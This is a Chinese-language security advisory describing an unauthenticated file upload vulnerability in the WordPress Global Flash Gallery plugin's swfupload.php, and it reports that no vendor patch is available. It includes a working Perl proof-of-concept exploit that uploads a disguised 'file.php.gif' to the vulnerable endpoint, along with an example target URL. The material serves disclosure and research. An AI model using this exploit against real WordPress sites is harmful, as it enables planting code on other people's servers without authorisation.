发布日期：2014-01-18
更新日期：2014-01-23

受影响系统：

WordPress Global Flash Gallery

描述：

---

BUGTRAQ  ID: 65060

WordPress Global Flash Galleries是创建和发布flash图库和幻灯片的插件。

Global-Flash Galleris允许将文件上传到未经身份验证的用户。此漏洞源于/global-flash-galleries/swfupload.php没有进行正确的cookie验证。

<*来源：Ashiyane Digital Security Team
  
  链接：http://packetstormsecurity.com/files/124850/wpglobalflashgalleries-upload.txt
*>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

#! /usr/bin/perl
  use LWP;
  use HTTP::Request::Common;
  
  my ($url, $file) = @ARGV;
  
  my $ua = LWP::UserAgent->new();
  my $req = POST $url,
    Content_Type => 'form-data',
    Content =>    [
  name => $name,
  galleryselect => 1, # Gallery ID (popup.php)
  Filedata => [ "$file", "file.php.gif",  Content_Type =>
  'image/gif' ]
            ];
  my $res = $ua->request( $req );
  if( $res->is_success ) {
    print $res->content;
  } else {
    print $res->status_line, "\n";
  }

--------------------
Example URI:
--------------------
http://www.example.com/wp-content/plugins/global-flash-galleries/swfupload.php

建议：

---

厂商补丁：

WordPress
---------
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://wordpress.org/plugins/global-flash-galleries/
http://downloads.wordpress.org/plugin/global-flash-galleries.zip

浏览次数：4003
严重程度：0（网友投票）